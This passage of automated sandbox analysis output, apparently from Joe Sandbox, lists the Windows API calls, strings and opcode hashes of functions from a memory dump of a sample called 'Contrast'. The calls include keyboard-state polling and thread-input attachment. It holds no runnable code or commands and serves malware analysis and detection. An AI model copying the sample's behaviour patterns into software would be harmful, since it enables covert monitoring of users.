                                                                                                                                        • Instruction ID: 6f4f39d39d0651cd256b4890b4b0bcfae5fa990f567f53bcd7e53ea6337f4af9
                                                                                                                                        • Opcode Fuzzy Hash: 266baeefa5de27a31546b0b0195705486690dc818dce8385ac9679b7ddc3ed33
                                                                                                                                        • Instruction Fuzzy Hash: 53616E70900249AFDB21CF64EC88ABE7FB9FB55314F14845AF845A7291D731AD0AFB21
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005975CA
                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005975CD
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005975F1
                                                                                                                                        • _memset.LIBCMT ref: 00597602
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00597614
                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0059768C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 830647256-0
                                                                                                                                        • Opcode ID: 092e8fb6ba8d03167214025b53ab657c2f548b1d2e41fd9ee5d41c147658200a
                                                                                                                                        • Instruction ID: f76979a726c1d3e11f5195f58e77dc0c4a7bdc6ba1cd998ddb35a9d479baecee
                                                                                                                                        • Opcode Fuzzy Hash: 092e8fb6ba8d03167214025b53ab657c2f548b1d2e41fd9ee5d41c147658200a
                                                                                                                                        • Instruction Fuzzy Hash: D0615875904208AFDB20DFA8CC85EEE7BB8FB4D710F14019AFA14A72A1D770AD45DB60
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 005677DD
                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00567836
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00567848
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00567868
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 005678BB
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 005678CF
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 005678E4
                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 005678F1
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005678FA
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056790C
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00567917
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                        • Opcode ID: 9d2c17d382d2c3f93a8302cd4135db8d9a20803eb3e48eedd4d599358f979deb
                                                                                                                                        • Instruction ID: d8f911f3b84c94563b9f736bd3d37aafe1de77349be9cde8fd217a7852df9456
                                                                                                                                        • Opcode Fuzzy Hash: 9d2c17d382d2c3f93a8302cd4135db8d9a20803eb3e48eedd4d599358f979deb
                                                                                                                                        • Instruction Fuzzy Hash: 0F414B35A04219AFDF00DFA4D8489ADBFB9FF5C304F008469E955A7261DB70AA49DFA0
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00570530
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 005705B1
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 005705CC
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 005705E6
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 005705FB
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00570613
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00570625
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0057063D
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 0057064F
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00570667
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00570679
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        • Opcode ID: 16806fdfeb2ca4651e64af31750200d698b5a4937d76b1f431fe6a5d3b694675
                                                                                                                                        • Instruction ID: d75eef43d93fef3e5fac4bd3c56e06413536d86dfacf97b8f7971cb27e32f2fe
                                                                                                                                        • Opcode Fuzzy Hash: 16806fdfeb2ca4651e64af31750200d698b5a4937d76b1f431fe6a5d3b694675
                                                                                                                                        • Instruction Fuzzy Hash: 1041D8709047C9ADFF309B64A8143B5BEE07B65304F08E05DD5C94A6C1EBA499D8EF92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • CoInitialize.OLE32 ref: 00588AED
                                                                                                                                        • CoUninitialize.OLE32 ref: 00588AF8
                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,005A3BBC,?), ref: 00588B58
                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 00588BCB
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00588C65
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00588CC6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                                        • Opcode ID: 6394091b9137bf516f2cfc23f5de75f6df825a7ce7cdf036fdf418533a31f9f6
                                                                                                                                        • Instruction ID: a9a04aba9d006d4529ca5db1308c3db55e3bef483bd5f8ef5f50b44cd5d95026
                                                                                                                                        • Opcode Fuzzy Hash: 6394091b9137bf516f2cfc23f5de75f6df825a7ce7cdf036fdf418533a31f9f6
                                                                                                                                        • Instruction Fuzzy Hash: 75618D702087029FD710EF54C849F6ABBE8FF85714F404849F985AB291DB74ED48CBA2
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0057BB13
                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0057BB89
                                                                                                                                        • GetLastError.KERNEL32 ref: 0057BB93
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0057BC00
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                                        • Opcode ID: 58ed8d2f857fb97e2ee4f798378f8ed860be78f8b0b09bf4eff13183993c1dd9
                                                                                                                                        • Instruction ID: f2b280511d0c4b7521c824a1ebb0a188e5480c9e212a281d2cf3ad57678d18a8
                                                                                                                                        • Opcode Fuzzy Hash: 58ed8d2f857fb97e2ee4f798378f8ed860be78f8b0b09bf4eff13183993c1dd9
                                                                                                                                        • Instruction Fuzzy Hash: 6A31C235A002099FEB10DF64E849FAEBFB4FF95300F10802AE80D97295DB709941EB50
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0057357C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoad
                                                                                                                                        • String ID: ,z]0z]$,z]0z]$blank$info$question$stop$warning
                                                                                                                                        • API String ID: 2457776203-3192911061
                                                                                                                                        • Opcode ID: afab0f0d6fc89643c04da2504850dc580ec32a58f0940c24d3ae7820a6c6187b
                                                                                                                                        • Instruction ID: 3b309a90a72a6002b10f62f4a0c507c758f119f4f5e61c724e4dc332a8470cce
                                                                                                                                        • Opcode Fuzzy Hash: afab0f0d6fc89643c04da2504850dc580ec32a58f0940c24d3ae7820a6c6187b
                                                                                                                                        • Instruction Fuzzy Hash: C311E771648347BEAB005A54FC92DAA7FDCFF15770F20402EFA08A6181E7A56F40B7A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00569BCC
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00569BD7
                                                                                                                                        • GetParent.USER32 ref: 00569BF3
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00569BF6
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00569BFF
                                                                                                                                        • GetParent.USER32(?), ref: 00569C1B
                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569C1E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1536045017-1403004172
                                                                                                                                        • Opcode ID: 9176d871ff2ea9bd233295b869a7b3929cb1904f85775e10e12d8e4b2cd9d0e0
                                                                                                                                        • Instruction ID: d7c0dcee3de0b54ec602b2a93433488c935fae4f31836bd582c79b053142211e
                                                                                                                                        • Opcode Fuzzy Hash: 9176d871ff2ea9bd233295b869a7b3929cb1904f85775e10e12d8e4b2cd9d0e0
                                                                                                                                        • Instruction Fuzzy Hash: 2B21C174900108AFDF04ABA4DC89EFEBFB9FFA6310F100115F961932E1DB7449189B60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00569CB5
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00569CC0
                                                                                                                                        • GetParent.USER32 ref: 00569CDC
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00569CDF
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00569CE8
                                                                                                                                        • GetParent.USER32(?), ref: 00569D04
                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569D07
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1536045017-1403004172
                                                                                                                                        • Opcode ID: ab596a144bdf8d4fe673e465335055553000b87d5f39880050609651c8ec1c30
                                                                                                                                        • Instruction ID: 3c1c7c31dd37d8d1744ca04b06e6aaf1eaec140fa2e52a30876c432f9d07f75b
                                                                                                                                        • Opcode Fuzzy Hash: ab596a144bdf8d4fe673e465335055553000b87d5f39880050609651c8ec1c30
                                                                                                                                        • Instruction Fuzzy Hash: FD21AF75A00109AFDF04ABA4CC89EFEBFB9FFA6300F100115F951972D1DB758929AA60
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32 ref: 00569D27
                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00569D3C
                                                                                                                                        • _wcscmp.LIBCMT ref: 00569D4E
                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00569DC9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                                        • Opcode ID: 047dce46ee32589f9904cccb0cba1d5742a5ad0cc621f73674b7359c0d949e00
                                                                                                                                        • Instruction ID: 819a540c8702775f2d47717d475011ca803f08ea218f6fce4bf6129e3e9974d9
                                                                                                                                        • Opcode Fuzzy Hash: 047dce46ee32589f9904cccb0cba1d5742a5ad0cc621f73674b7359c0d949e00
                                                                                                                                        • Instruction Fuzzy Hash: DF112C76248307BDFB002620EC0ADA67FACFB55324F200036FA10E60D1FE756E155791
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00588FC1
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00588FEE
                                                                                                                                        • CoUninitialize.OLE32 ref: 00588FF8
                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 005890F8
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00589225
                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,005A3BDC), ref: 00589259
                                                                                                                                        • CoGetObject.OLE32(?,00000000,005A3BDC,?), ref: 0058927C
                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0058928F
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0058930F
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0058931F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2395222682-0
                                                                                                                                        • Opcode ID: c934ed1481dedae09bbd94299b19a24a7c69319a9c67a817b7d7185a50887f3d
                                                                                                                                        • Instruction ID: 37f0a3d14ef9475fa224388196d86f3015696ff422d5a5393e69a27c6082b59a
                                                                                                                                        • Opcode Fuzzy Hash: c934ed1481dedae09bbd94299b19a24a7c69319a9c67a817b7d7185a50887f3d
                                                                                                                                        • Instruction Fuzzy Hash: 0DC13971208305AFD700EF64C88896BBBE9FF89748F04491DF98AAB251DB71ED45CB52
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 005719EF
                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00570A67,?,00000001), ref: 00571A03
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00571A0A
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570A67,?,00000001), ref: 00571A19
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00571A2B
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570A67,?,00000001), ref: 00571A44
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00570A67,?,00000001), ref: 00571A56
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00570A67,?,00000001), ref: 00571A9B
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00570A67,?,00000001), ref: 00571AB0
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00570A67,?,00000001), ref: 00571ABB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                        • Opcode ID: 924764125a8fbb75140cafd3c7401a156bf7e9aa1f9bebc5e880a6055fa8efd6
                                                                                                                                        • Instruction ID: 580400403e58b564a74f9ac5ba8d2c0ffae96bacac408a1fcea5759b77787f32
                                                                                                                                        • Opcode Fuzzy Hash: 924764125a8fbb75140cafd3c7401a156bf7e9aa1f9bebc5e880a6055fa8efd6
                                                                                                                                        • Instruction Fuzzy Hash: 7931E171512604AFDB309F18ED44FB93BAAFB75319F108116F808C7190DB74DD88AB94
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000008), ref: 0051260D
                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00512617
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0051262C
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00512634
                                                                                                                                        • GetClientRect.USER32(?), ref: 0054C0FC
                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0054C113
                                                                                                                                        • GetWindowDC.USER32(?), ref: 0054C11F
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0054C12E
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0054C140
                                                                                                                                        • GetSysColor.USER32(00000005), ref: 0054C15E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3430376129-0
                                                                                                                                        • Opcode ID: 21ae8b34c1573931fb8da0ba6fb09ff37e06ac5a267473d6f32eff84858411ca
                                                                                                                                        • Instruction ID: ce6a6e5c3538ea7b7f0edcf4b67b4f59cdf450566b2b989bd87c0699c859ead6
                                                                                                                                        • Opcode Fuzzy Hash: 21ae8b34c1573931fb8da0ba6fb09ff37e06ac5a267473d6f32eff84858411ca
                                                                                                                                        • Instruction Fuzzy Hash: 1B11BB31510204BFEB615FA4EC48BE97FB2FB6A321F104225FA65950E1CB3109A9FF10
                                                                                                                                        APIs
                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0051ADE1
                                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 0051AE80
                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 0051AFD7
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00552F64
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00552FC9
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00552FF6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
